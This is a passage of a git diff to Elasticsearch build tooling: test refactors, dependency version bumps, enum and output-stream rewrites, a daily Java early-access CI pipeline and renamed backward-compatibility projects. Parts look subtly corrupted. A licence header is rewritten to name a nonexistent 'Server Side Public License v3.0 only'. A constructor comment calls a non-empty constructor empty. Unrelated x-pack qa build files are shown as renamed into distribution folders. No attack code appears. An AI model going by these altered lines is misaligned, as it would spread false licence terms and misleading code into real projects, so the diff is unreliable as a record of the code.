b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatchTests.java index 21dce6f6c95d6..ba684e389a2d6 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatchTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatchTests.java @@ -15,6 +15,7 @@ import com.fasterxml.jackson.databind.node.ObjectNode; import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.TransformTests; import org.hamcrest.CoreMatchers; import org.junit.Test; @@ -38,7 +39,7 @@ public class AddMatchTests extends TransformTests { public void testAddAllNotSupported() throws Exception { String testName = "/rest/transform/match/match_original.yml"; List tests = getTests(testName); - JsonNode addNode = MAPPER.convertValue("_doc", JsonNode.class); + var addNode = SerializableJsonNode.of("_doc", JsonNode.class); assertEquals( "adding matches is only supported for named tests", assertThrows( @@ -52,7 +53,7 @@ public void testAddAllNotSupported() throws Exception { public void testAddByTest() throws Exception { String testName = "/rest/transform/match/match_original.yml"; List tests = getTests(testName); - JsonNode addNode = MAPPER.convertValue(123456789, JsonNode.class); + var addNode = SerializableJsonNode.of(123456789, JsonNode.class); validateTest(tests, true); List transformedTests = transformTests( tests, diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatchTests.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatchTests.java index f1ed68f1f3d64..c2752e4840917 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatchTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatchTests.java @@ -15,6 +15,7 @@ import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; import org.elasticsearch.gradle.internal.test.rest.transform.AssertObjectNodes; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.TransformTests; import org.junit.Test; @@ -33,7 +34,7 @@ public void testReplaceMatch() throws Exception { String test_transformed = "/rest/transform/match/match_transformed.yml"; List expectedTransformation = getTests(test_transformed); - JsonNode replacementNode = MAPPER.convertValue("_replaced_type", JsonNode.class); + SerializableJsonNode replacementNode = SerializableJsonNode.of("_replaced_type", JsonNode.class); List transformedTests = transformTests( tests, List.of( diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextualTests.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextualTests.java index 0fcbd0a94b333..c321c7661bfe6 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextualTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextualTests.java @@ -9,22 +9,17 @@ package org.elasticsearch.gradle.internal.test.rest.transform.text; -import com.fasterxml.jackson.databind.ObjectMapper; import com.fasterxml.jackson.databind.node.ObjectNode; import com.fasterxml.jackson.databind.node.TextNode; -import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; import org.elasticsearch.gradle.internal.test.rest.transform.AssertObjectNodes; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.TransformTests; import org.junit.Test; import java.util.List; public class ReplaceTextualTests extends TransformTests { - - private static final YAMLFactory YAML_FACTORY = new YAMLFactory(); - private static final ObjectMapper MAPPER = new ObjectMapper(YAML_FACTORY); - @Test public void testReplaceAll() throws Exception { String test_original = "/rest/transform/text/text_replace_original.yml"; @@ -36,9 +31,9 @@ public void testReplaceAll() throws Exception { List transformedTests = transformTests( tests, List.of( - new ReplaceTextual("key_to_replace", "value_to_replace", MAPPER.convertValue("_replaced_value", TextNode.class), null), - new ReplaceIsTrue("is_true_to_replace", MAPPER.convertValue("is_true_replaced", TextNode.class)), - new ReplaceIsFalse("is_false_to_replace", MAPPER.convertValue("is_false_replaced", TextNode.class)) + new ReplaceTextual("key_to_replace", "value_to_replace", SerializableJsonNode.of("_replaced_value", TextNode.class), null), + new ReplaceIsTrue("is_true_to_replace", SerializableJsonNode.of("is_true_replaced", TextNode.class)), + new ReplaceIsFalse("is_false_to_replace", SerializableJsonNode.of("is_false_replaced", TextNode.class)) ) ); diff --git a/build-tools-internal/version.properties b/build-tools-internal/version.properties index 8694c73ad0990..ee7ec6432ce5d 100644 --- a/build-tools-internal/version.properties +++ b/build-tools-internal/version.properties @@ -1,8 +1,8 @@ -elasticsearch = 9.1.0 +elasticsearch = 9.1.4 lucene = 10.2.2 bundled_jdk_vendor = openjdk -bundled_jdk = 24+36@1f9ff9062db4449d8ca828c504ffae90 +bundled_jdk = 24.0.2+12@fdc5d0102fe0414db21410ad5834341f # optional dependencies spatial4j = 0.7 jts = 1.15.0 @@ -17,12 +17,12 @@ jna = 5.12.1 netty = 4.1.118.Final commons_lang3 = 3.9 google_oauth_client = 1.34.1 -awsv2sdk = 2.30.38 +awsv2sdk = 2.31.78 reactive_streams = 1.0.4 antlr4 = 4.13.1 # bouncy castle version for non-fips. fips jars use a different version -bouncycastle=1.78.1 +bouncycastle=1.79 # used by security and idp (need to be in sync due to cross-dependency in testing) opensaml = 4.3.0 diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/Architecture.java b/build-tools/src/main/java/org/elasticsearch/gradle/Architecture.java index c7e6546e66b9a..c2654f9ae851f 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/Architecture.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/Architecture.java @@ -11,15 +11,19 @@ public enum Architecture { - X64("x86_64", "linux/amd64"), - AARCH64("aarch64", "linux/arm64"); + X64("x86_64", "linux/amd64", "amd64", "x64"), + AARCH64("aarch64", "linux/arm64", "arm64", "aarch64"); public final String classifier; public final String dockerPlatform; + public final String dockerClassifier; + public final String javaClassifier; - Architecture(String classifier, String dockerPlatform) { + Architecture(String classifier, String dockerPlatform, String dockerClassifier, String javaClassifier) { this.classifier = classifier; this.dockerPlatform = dockerPlatform; + this.dockerClassifier = dockerClassifier; + this.javaClassifier = javaClassifier; } public static Architecture current() { diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/DistributionDownloadPlugin.java b/build-tools/src/main/java/org/elasticsearch/gradle/DistributionDownloadPlugin.java index 35748459ecac3..838752a515b05 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/DistributionDownloadPlugin.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/DistributionDownloadPlugin.java @@ -191,10 +191,12 @@ private static void addIvyRepo(Project project, String name, String url, String repo.metadataSources(IvyArtifactRepository.MetadataSources::artifact); repo.patternLayout(layout -> layout.artifact("/downloads/elasticsearch/[module]-[revision](-[classifier]).[ext]")); }); - project.getRepositories().exclusiveContent(exclusiveContentRepository -> { - exclusiveContentRepository.filter(config -> config.includeGroup(group)); - exclusiveContentRepository.forRepositories(ivyRepo); - }); + if (project != project.getRootProject()) { + project.getRepositories().exclusiveContent(exclusiveContentRepository -> { + exclusiveContentRepository.filter(config -> config.includeGroup(group)); + exclusiveContentRepository.forRepositories(ivyRepo); + }); + } } private static void setupDownloadServiceRepo(Project project) { diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/LazyFileOutputStream.java b/build-tools/src/main/java/org/elasticsearch/gradle/LazyFileOutputStream.java index c3da389fc30d4..98f442f742e54 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/LazyFileOutputStream.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/LazyFileOutputStream.java @@ -3,8 +3,7 @@ * or more contributor license agreements. Licensed under the "Elastic License * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side * Public License v 1"; you may not use this file except in compliance with, at - * your election, the "Elastic License 2.0", the "GNU Affero General Public - * License v3.0 only", or the "Server Side Public License, v 1". + * your election, the "Server Side Public License v3.0 only", or the "Server Side Public License, v 1". */ package org.elasticsearch.gradle; @@ -18,48 +17,58 @@ * An outputstream to a File that is lazily opened on the first write. */ class LazyFileOutputStream extends OutputStream { - private OutputStream delegate; + private final File file; + private volatile OutputStream delegate; + private volatile boolean initialized = false; + private final Object lock = new Object(); LazyFileOutputStream(File file) { - // use an initial dummy delegate to avoid doing a conditional on every write - this.delegate = new OutputStream() { - private void bootstrap() throws IOException { - file.getParentFile().mkdirs(); - delegate = new FileOutputStream(file); - } - - @Override - public void write(int b) throws IOException { - bootstrap(); - delegate.write(b); - } - - @Override - public void write(byte b[], int off, int len) throws IOException { - bootstrap(); - delegate.write(b, off, len); - } + this.file = file; + } - @Override - public void write(byte b[]) throws IOException { - bootstrap(); - delegate.write(b); + private void ensureInitialized() throws IOException { + if (initialized == false) { + synchronized (lock) { + if (initialized == false) { + file.getParentFile().mkdirs(); + delegate = new FileOutputStream(file); + initialized = true; + } } - }; + } } @Override public void write(int b) throws IOException { + ensureInitialized(); delegate.write(b); } @Override public void write(byte b[], int off, int len) throws IOException { + ensureInitialized(); delegate.write(b, off, len); } + @Override + public void write(byte b[]) throws IOException { + ensureInitialized(); + delegate.write(b); + } + @Override public void close() throws IOException { - delegate.close(); + synchronized (lock) { + if (initialized && delegate != null) { + delegate.close(); + } + } + } + + @Override + public void flush() throws IOException { + if (initialized && delegate != null) { + delegate.flush(); + } } } diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/OS.java b/build-tools/src/main/java/org/elasticsearch/gradle/OS.java index d5649f94cf1a4..fda24687ad4e8 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/OS.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/OS.java @@ -15,9 +15,16 @@ import java.util.function.Supplier; public enum OS { - WINDOWS, - MAC, - LINUX; + WINDOWS("windows"), + MAC("darwin"), + LINUX("linux"); + + public final String javaOsReference; + + OS(String javaOsReference) { + // This constructor is intentionally empty, but it can be used to set up any necessary state. + this.javaOsReference = javaOsReference; + } public static OS current() { String os = System.getProperty("os.name", ""); diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/VersionProperties.java b/build-tools/src/main/java/org/elasticsearch/gradle/VersionProperties.java index 88c7ea3684226..f71b180619002 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/VersionProperties.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/VersionProperties.java @@ -16,7 +16,12 @@ /** * Accessor for shared dependency versions used by elasticsearch, namely the elasticsearch and lucene versions. + * + * @deprecated use ext values set by org.elasticsearch.gradle.internal.conventions.VersionPropertiesPlugin or + * org.elasticsearch.gradle.internal.conventions.VersionPropertiesBuildService + * */ +@Deprecated public class VersionProperties { public static String getElasticsearch() { diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/test/TestBuildInfoPlugin.java b/build-tools/src/main/java/org/elasticsearch/gradle/test/TestBuildInfoPlugin.java index 3cab57a333d2c..c0aabfe17e56f 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/test/TestBuildInfoPlugin.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/test/TestBuildInfoPlugin.java @@ -18,8 +18,11 @@ import org.gradle.api.provider.ProviderFactory; import org.gradle.api.tasks.SourceSet; import org.gradle.api.tasks.SourceSetContainer; +import org.gradle.api.tasks.testing.Test; import org.gradle.language.jvm.tasks.ProcessResources; +import java.util.List; + import javax.inject.Inject; /** @@ -53,5 +56,14 @@ public void apply(Project project) { project.getTasks().withType(ProcessResources.class).named("processResources").configure(task -> { task.into("META-INF", copy -> copy.from(testBuildInfoTask)); }); + + if (project.getRootProject().getName().equals("elasticsearch")) { + project.getTasks() + .withType(Test.class) + .matching(test -> List.of("test", "internalClusterTest").contains(test.getName())) + .configureEach(test -> { + test.systemProperty("es.entitlement.enableForTests", "true"); + }); + } } } diff --git a/build-tools/src/testFixtures/groovy/org/elasticsearch/gradle/fixtures/AbstractGradleFuncTest.groovy b/build-tools/src/testFixtures/groovy/org/elasticsearch/gradle/fixtures/AbstractGradleFuncTest.groovy index d52b7d321c729..447f0b8af496f 100644 --- a/build-tools/src/testFixtures/groovy/org/elasticsearch/gradle/fixtures/AbstractGradleFuncTest.groovy +++ b/build-tools/src/testFixtures/groovy/org/elasticsearch/gradle/fixtures/AbstractGradleFuncTest.groovy @@ -9,25 +9,22 @@ package org.elasticsearch.gradle.fixtures +import spock.lang.Specification +import spock.lang.TempDir + import org.apache.commons.io.FileUtils import org.apache.commons.io.IOUtils import org.elasticsearch.gradle.internal.test.BuildConfigurationAwareGradleRunner import org.elasticsearch.gradle.internal.test.InternalAwareGradleRunner import org.elasticsearch.gradle.internal.test.NormalizeOutputGradleRunner import org.elasticsearch.gradle.internal.test.TestResultExtension -import org.gradle.internal.component.external.model.ComponentVariant import org.gradle.testkit.runner.BuildResult import org.gradle.testkit.runner.GradleRunner import org.junit.Rule import org.junit.rules.TemporaryFolder -import spock.lang.Specification -import spock.lang.TempDir import java.lang.management.ManagementFactory import java.nio.charset.StandardCharsets -import java.nio.file.Files -import java.io.File -import java.nio.file.Path import java.util.jar.JarEntry import java.util.jar.JarOutputStream import java.util.zip.ZipEntry @@ -47,6 +44,7 @@ abstract class AbstractGradleFuncTest extends Specification { File buildFile File propertiesFile File projectDir + File versionPropertiesFile protected boolean configurationCacheCompatible = true protected boolean buildApiRestrictionsDisabled = false @@ -57,6 +55,18 @@ abstract class AbstractGradleFuncTest extends Specification { settingsFile << "rootProject.name = 'hello-world'\n" buildFile = testProjectDir.newFile('build.gradle') propertiesFile = testProjectDir.newFile('gradle.properties') + File buildToolsDir = testProjectDir.newFolder("build-tools-internal") + versionPropertiesFile = new File(buildToolsDir, 'version.properties') + versionPropertiesFile.text = """ + elasticsearch = 9.1.0 + lucene = 10.2.2 + + bundled_jdk_vendor = openjdk + bundled_jdk = 24+36@1f9ff9062db4449d8ca828c504ffae90 + minimumJdkVersion = 21 + minimumRuntimeJava = 21 + minimumCompilerJava = 21 + """ propertiesFile << "org.gradle.java.installations.fromEnv=JAVA_HOME,RUNTIME_JAVA_HOME,JAVA15_HOME,JAVA14_HOME,JAVA13_HOME,JAVA12_HOME,JAVA11_HOME,JAVA8_HOME" @@ -83,7 +93,8 @@ abstract class AbstractGradleFuncTest extends Specification { if (subProjectBuild.exists() == false) { settingsFile << "include \"${subProjectPath}\"\n" } - subProjectBuild + subProjectBuild.parentFile.mkdirs() + return subProjectBuild } File subProject(String subProjectPath, Closure configAction) { @@ -161,10 +172,10 @@ abstract class AbstractGradleFuncTest extends Specification { File internalBuild( List extraPlugins = [], String maintenance = "7.16.10", - String bugfix2 = "8.1.3", - String bugfix = "8.2.1", - String staged = "8.3.0", - String minor = "8.4.0", + String major4 = "8.1.3", + String major3 = "8.2.1", + String major2 = "8.3.0", + String major1 = "8.4.0", String current = "9.0.0" ) { buildFile << """plugins { @@ -174,31 +185,31 @@ abstract class AbstractGradleFuncTest extends Specification { import org.elasticsearch.gradle.Architecture import org.elasticsearch.gradle.internal.BwcVersions + import org.elasticsearch.gradle.internal.info.DevelopmentBranch import org.elasticsearch.gradle.Version Version currentVersion = Version.fromString("${current}") def versionList = [ Version.fromString("$maintenance"), - Version.fromString("$bugfix2"), - Version.fromString("$bugfix"), - Version.fromString("$staged"), - Version.fromString("$minor"), + Version.fromString("$major4"), + Version.fromString("$major3"), + Version.fromString("$major2"), + Version.fromString("$major1"), currentVersion ] - BwcVersions versions = new BwcVersions(currentVersion, versionList, ['main', '8.x', '8.3', '8.2', '8.1', '7.16']) - buildParams.setBwcVersions(project.provider { versions} ) + BwcVersions versions = new BwcVersions(currentVersion, versionList, [ + new DevelopmentBranch('main', Version.fromString("$current")), + new DevelopmentBranch('8.x', Version.fromString("$major1")), + new DevelopmentBranch('8.3', Version.fromString("$major2")), + new DevelopmentBranch('8.2', Version.fromString("$major3")), + new DevelopmentBranch('8.1', Version.fromString("$major4")), + new DevelopmentBranch('7.16', Version.fromString("$maintenance")), + ]) + buildParams.setBwcVersions(project.provider { versions } ) """ } - void setupLocalGitRepo() { - execute("git init") - execute('git config user.email "build-tool@elastic.co"') - execute('git config user.name "Build tool"') - execute("git add .") - execute('git commit -m "Initial"') - } - void execute(String command, File workingDir = testProjectDir.root) { def proc = command.execute(Collections.emptyList(), workingDir) proc.waitFor() diff --git a/build.gradle b/build.gradle index 5b534394b4e1c..d26d4d73748e4 100644 --- a/build.gradle +++ b/build.gradle @@ -21,6 +21,8 @@ import org.elasticsearch.gradle.internal.ResolveAllDependencies import org.elasticsearch.gradle.util.GradleUtils import org.gradle.plugins.ide.eclipse.model.AccessRule +import groovy.xml.XmlParser; +import groovy.xml.XmlNodePrinter; import java.nio.file.Files import static java.nio.file.StandardCopyOption.REPLACE_EXISTING @@ -35,11 +37,11 @@ buildscript { plugins { id 'lifecycle-base' id 'elasticsearch.docker-support' + id 'elasticsearch.internal-distribution-download' + id 'elasticsearch.jdk-download' id 'elasticsearch.global-build-info' id 'elasticsearch.build-complete' id 'elasticsearch.build-scan' - id 'elasticsearch.jdk-download' - id 'elasticsearch.internal-distribution-download' id 'elasticsearch.runtime-jdk-provision' id 'elasticsearch.ide' id 'elasticsearch.forbidden-dependencies' @@ -194,6 +196,21 @@ tasks.register("updateCIBwcVersions") { ] ) + writeBuildkitePipeline( + ".buildkite/pipelines/periodic-java-ea.yml", + ".buildkite/pipelines/periodic-java-ea.template.yml", + [ + new ListExpansion(versions: filterIntermediatePatches(buildParams.bwcVersions.unreleasedIndexCompatible), variable: "BWC_LIST"), + ], + [ + new StepExpansion( + templatePath: ".buildkite/pipelines/periodic-java-ea.bwc.template.yml", + versions: filterIntermediatePatches(buildParams.bwcVersions.indexCompatible), + variable: "BWC_STEPS" + ), + ] + ) + expandBwcSteps( ".buildkite/pipelines/periodic-packaging.yml", ".buildkite/pipelines/periodic-packaging.template.yml", @@ -325,12 +342,14 @@ allprojects { resolveJavaToolChain = true // ensure we have best possible caching of bwc builds - dependsOn ":distribution:bwc:bugfix:buildBwcLinuxTar" - dependsOn ":distribution:bwc:bugfix2:buildBwcLinuxTar" - dependsOn ":distribution:bwc:bugfix3:buildBwcLinuxTar" - dependsOn ":distribution:bwc:minor:buildBwcLinuxTar" - dependsOn ":distribution:bwc:staged:buildBwcLinuxTar" - dependsOn ":distribution:bwc:staged2:buildBwcLinuxTar" + dependsOn ":distribution:bwc:major1:buildBwcLinuxTar" + dependsOn ":distribution:bwc:major2:buildBwcLinuxTar" + dependsOn ":distribution:bwc:major3:buildBwcLinuxTar" + dependsOn ":distribution:bwc:major4:buildBwcLinuxTar" + dependsOn ":distribution:bwc:minor1:buildBwcLinuxTar" + dependsOn ":distribution:bwc:minor2:buildBwcLinuxTar" + dependsOn ":distribution:bwc:minor3:buildBwcLinuxTar" + dependsOn ":distribution:bwc:minor4:buildBwcLinuxTar" } if (project.path.contains("fixture")) { dependsOn tasks.withType(ComposePull) @@ -366,7 +385,7 @@ allprojects { } } } - + proj.tasks.register("bcUpgradeTest$partString") { dependsOn tasks.matching { it.name == 'bcUpgradeTest' } withReleaseBuild { diff --git a/catalog-info.yaml b/catalog-info.yaml index 0768e1670666f..91b0f692d46b3 100644 --- a/catalog-info.yaml +++ b/catalog-info.yaml @@ -99,6 +99,46 @@ spec: publish_commit_status: false trigger_mode: none --- +# yaml-language-server: $schema=https://gist.githubusercontent.com/elasticmachine/988b80dae436cafea07d9a4a460a011d/raw/e57ee3bed7a6f73077a3f55a38e76e40ec87a7cf/rre.schema.json +apiVersion: backstage.io/v1alpha1 +kind: Resource +metadata: + name: buildkite-pipeline-elasticsearch-periodic-java-ea + description: Elasticsearch tests and checks that are run against the latest Java EA builds + links: + - title: Pipeline + url: https://buildkite.com/elastic/elasticsearch-periodic-java-ea +spec: + type: buildkite-pipeline + system: buildkite + owner: group:elasticsearch-team + implementation: + apiVersion: buildkite.elastic.dev/v1 + kind: Pipeline + metadata: + description: ":elasticsearch: Tests and checks that are run daily against the latest Java EA builds" + name: elasticsearch / periodic / java-ea + spec: + repository: elastic/elasticsearch + pipeline_file: .buildkite/pipelines/periodic-java-ea.yml + branch_configuration: main + teams: + elasticsearch-team: {} + ml-core: {} + everyone: + access_level: BUILD_AND_READ + provider_settings: + build_branches: false + build_pull_requests: false + publish_commit_status: false + trigger_mode: none + schedules: + Periodically on main: + branch: main + cronline: "0 4 * * * America/New_York" + message: "Run java EA tests 1x per day" +--- + # yaml-language-server: $schema=https://gist.githubusercontent.com/elasticmachine/988b80dae436cafea07d9a4a460a011d/raw/e57ee3bed7a6f73077a3f55a38e76e40ec87a7cf/rre.schema.json apiVersion: backstage.io/v1alpha1 kind: Resource diff --git a/distribution/build.gradle b/distribution/build.gradle index fa6223d30e63b..e13449f4036bf 100644 --- a/distribution/build.gradle +++ b/distribution/build.gradle @@ -20,6 +20,8 @@ import org.elasticsearch.gradle.transform.FilteringJarTransform import java.nio.file.Files import java.nio.file.Path +import static org.elasticsearch.gradle.internal.toolchain.EarlyAccessCatalogJdkToolchainResolver.findLatestPreReleaseBuildNumber + plugins { id 'base' id 'elasticsearch.distro' @@ -48,9 +50,9 @@ dependencies { def thisProj = project rootProject.allprojects { proj -> - proj.plugins.withType(DependenciesInfoPlugin) { - thisProj.dependencies.add("dependencyInfos", project.dependencies.project(path: proj.path)) - } + proj.plugins.withType(DependenciesInfoPlugin) { + thisProj.dependencies.add("dependencyInfos", project.dependencies.project(path: proj.path)) + } } /***************************************************************************** @@ -61,9 +63,10 @@ rootProject.allprojects { proj -> tasks.register("generateDependenciesReport", ConcatFilesTask) { files = configurations.dependencyInfos headerLine = "name,version,url,license,sourceURL" - target = new File(providers.systemProperty('csv') - .orElse("${project.buildDir}/reports/dependencies/es-dependencies.csv") - .get() + target = new File( + providers.systemProperty('csv') + .orElse("${project.buildDir}/reports/dependencies/es-dependencies.csv") + .get() ) // explicitly add our dependency on the JDK String jdkVersion = VersionProperties.versions.get('bundled_jdk').split('@')[0] @@ -246,20 +249,46 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { apply plugin: 'elasticsearch.jdk-download' apply plugin: 'elasticsearch.repositories' - // Setup all required JDKs - project.jdks { - ['darwin', 'windows', 'linux'].each { platform -> - (platform == 'linux' || platform == 'darwin' ? ['x64', 'aarch64'] : ['x64']).each { architecture -> - "bundled_${platform}_${architecture}" { - it.platform = platform - it.version = VersionProperties.bundledJdkVersion - it.vendor = VersionProperties.bundledJdkVendor - it.architecture = architecture + if (buildParams.runtimeJava.preRelease) { + Integer buildNumber = Integer.getInteger("runtime.java.build") + String preReleaseType = buildParams.runtimeJava.preReleaseType + def runtimeJavaMajorVersion = Integer.parseInt(buildParams.runtimeJavaVersion.get().getMajorVersion()) + if (buildNumber == null) { + buildNumber = findLatestPreReleaseBuildNumber(runtimeJavaMajorVersion, preReleaseType); + } + String preReleaseVersionString = String.format("%d-%s+%d", runtimeJavaMajorVersion, preReleaseType, buildNumber); + + project.jdks { + ['darwin', 'windows', 'linux'].each { platform -> + (platform == 'linux' || platform == 'darwin' ? ['x64', 'aarch64'] : ['x64']).each { architecture -> + "bundled_${platform}_${architecture}" { + it.version = preReleaseVersionString; + it.vendor = "openjdk" + it.platform = platform + it.architecture = architecture + it.distributionVersion = preReleaseType + } + } + } + } + } else { + // Setup all required JDKs + project.jdks { + ['darwin', 'windows', 'linux'].each { platform -> + (platform == 'linux' || platform == 'darwin' ? ['x64', 'aarch64'] : ['x64']).each { architecture -> + "bundled_${platform}_${architecture}" { + it.platform = platform + it.version = VersionProperties.bundledJdkVersion + it.vendor = VersionProperties.bundledJdkVendor + it.architecture = architecture + } } } } + } + // TODO: the map needs to be an input of the tasks, so that when it changes, the task will re-run... /***************************************************************************** * Properties to expand when copying packaging files * @@ -288,7 +317,8 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { } all { resolutionStrategy.dependencySubstitution { - substitute module("org.apache.logging.log4j:log4j-core") using project(":libs:log4j") because "patched to remove JndiLookup class"} + substitute module("org.apache.logging.log4j:log4j-core") using project(":libs:log4j") because "patched to remove JndiLookup class" + } } } @@ -354,7 +384,7 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { into('platform') { from(configurations.libsNative) if (os != null) { - include (os + '-' + architecture + '/*') + include(os + '-' + architecture + '/*') } } into('entitlement-agent') { @@ -416,7 +446,7 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { // main config files, processed with distribution specific substitutions from '../src/config' exclude 'log4j2.properties' // this is handled separately below - filter("tokens" : expansionsForDistribution(distributionType, isTestDistro), ReplaceTokens.class) + filter("tokens": expansionsForDistribution(distributionType, isTestDistro), ReplaceTokens.class) } from buildDefaultLog4jConfigTaskProvider from isTestDistro ? integTestConfigFiles : defaultConfigFiles @@ -431,11 +461,11 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { exclude '*.exe' exclude '*.bat' eachFile { - it.permissions{ + it.permissions { unix(0755) } } - filter("tokens" : expansionsForDistribution(distributionType, testDistro), ReplaceTokens.class) + filter("tokens": expansionsForDistribution(distributionType, testDistro), ReplaceTokens.class) } // windows files, only for zip if (distributionType == 'zip') { @@ -443,7 +473,7 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { from '../src/bin' include '*.bat' filter(FixCrLfFilter, eol: FixCrLfFilter.CrLf.newInstance('crlf')) - filter("tokens" : expansionsForDistribution(distributionType, testDistro), ReplaceTokens.class) + filter("tokens": expansionsForDistribution(distributionType, testDistro), ReplaceTokens.class) } with copySpec { from '../src/bin' @@ -466,7 +496,7 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { if (testDistro) { from buildServerNoticeTaskProvider } else { - from (buildDefaultNoticeTaskProvider) { + from(buildDefaultNoticeTaskProvider) { filePermissions { unix(0644) } @@ -547,57 +577,57 @@ subprojects { String footer = "# Built for ${project.name}-${project.version} " + "(${distributionType})" Map expansions = [ - 'project.name': project.name, - 'project.version': version, + 'project.name' : project.name, + 'project.version' : version, 'project.minor.version': "${VersionProperties.elasticsearchVersion.major}.${VersionProperties.elasticsearchVersion.minor}", - 'path.conf': [ + 'path.conf' : [ 'deb': '/etc/elasticsearch', 'rpm': '/etc/elasticsearch', 'def': '"$ES_HOME"/config' ], - 'path.data': [ + 'path.data' : [ 'deb': packagingPathData, 'rpm': packagingPathData, 'def': '#path.data: /path/to/data' ], - 'path.env': [ + 'path.env' : [ 'deb': '/etc/default/elasticsearch', 'rpm': '/etc/sysconfig/elasticsearch', /* There isn't one of these files for tar or zip but its important to make an empty string here so the script can properly skip it. */ 'def': 'if [ -z "$ES_PATH_CONF" ]; then ES_PATH_CONF="$ES_HOME"/config; done', ], - 'source.path.env': [ + 'source.path.env' : [ 'deb': 'source /etc/default/elasticsearch', 'rpm': 'source /etc/sysconfig/elasticsearch', 'def': 'if [ -z "$ES_PATH_CONF" ]; then ES_PATH_CONF="$ES_HOME"/config; fi', ], - 'path.logs': [ + 'path.logs' : [ 'deb': packagingPathLogs, 'rpm': packagingPathLogs, 'def': '#path.logs: /path/to/logs' ], - 'scripts.footer': [ + 'scripts.footer' : [ /* Debian needs exit 0 on these scripts so we add it here and preserve the pretty footer. */ 'deb': "exit 0\n${footer}", 'def': footer ], - 'es.distribution.type': [ + 'es.distribution.type' : [ 'deb': 'deb', 'rpm': 'rpm', 'tar': 'tar', 'zip': 'zip' ], - 'license.name': [ + 'license.name' : [ 'deb': 'Elastic-License' ], - 'license.text': [ + 'license.text' : [ 'deb': licenseText, ], ] @@ -629,22 +659,6 @@ subprojects { } } -['archives:windows-zip', - 'archives:darwin-tar', - 'archives:darwin-aarch64-tar', - 'archives:linux-aarch64-tar', - 'archives:linux-tar', - 'archives:integ-test-zip', - 'packages:rpm', 'packages:deb', - 'packages:aarch64-rpm', 'packages:aarch64-deb', -].forEach { subName -> - Project subproject = project("${project.path}:${subName}") - Configuration configuration = configurations.create(subproject.name) - dependencies { - "${configuration.name}" project(path: subproject.path, configuration:'default') - } -} - // This artifact makes it possible for other projects to pull // in the final log4j2.properties configuration, as it appears in the // archive distribution. diff --git a/distribution/bwc/bugfix3/build.gradle b/distribution/bwc/major1/build.gradle similarity index 100% rename from distribution/bwc/bugfix3/build.gradle rename to distribution/bwc/major1/build.gradle diff --git a/distribution/bwc/maintenance/build.gradle b/distribution/bwc/major2/build.gradle similarity index 100% rename from distribution/bwc/maintenance/build.gradle rename to distribution/bwc/major2/build.gradle diff --git a/distribution/bwc/minor/build.gradle b/distribution/bwc/major3/build.gradle similarity index 100% rename from distribution/bwc/minor/build.gradle rename to distribution/bwc/major3/build.gradle diff --git a/distribution/bwc/staged/build.gradle b/distribution/bwc/major4/build.gradle similarity index 100% rename from distribution/bwc/staged/build.gradle rename to distribution/bwc/major4/build.gradle diff --git a/distribution/bwc/staged2/build.gradle b/distribution/bwc/minor1/build.gradle similarity index 100% rename from distribution/bwc/staged2/build.gradle rename to distribution/bwc/minor1/build.gradle diff --git a/x-pack/plugin/async-search/qa/build.gradle b/distribution/bwc/minor2/build.gradle similarity index 100% rename from x-pack/plugin/async-search/qa/build.gradle rename to distribution/bwc/minor2/build.gradle diff --git a/x-pack/plugin/autoscaling/qa/build.gradle b/distribution/bwc/minor3/build.gradle similarity index 100% rename from x-pack/plugin/autoscaling/qa/build.gradle rename to distribution/bwc/minor3/build.gradle diff --git a/x-pack/plugin/enrich/qa/build.gradle b/distribution/bwc/minor4/build.gradle similarity index 100% rename from x-pack/plugin/enrich/qa/build.gradle rename to 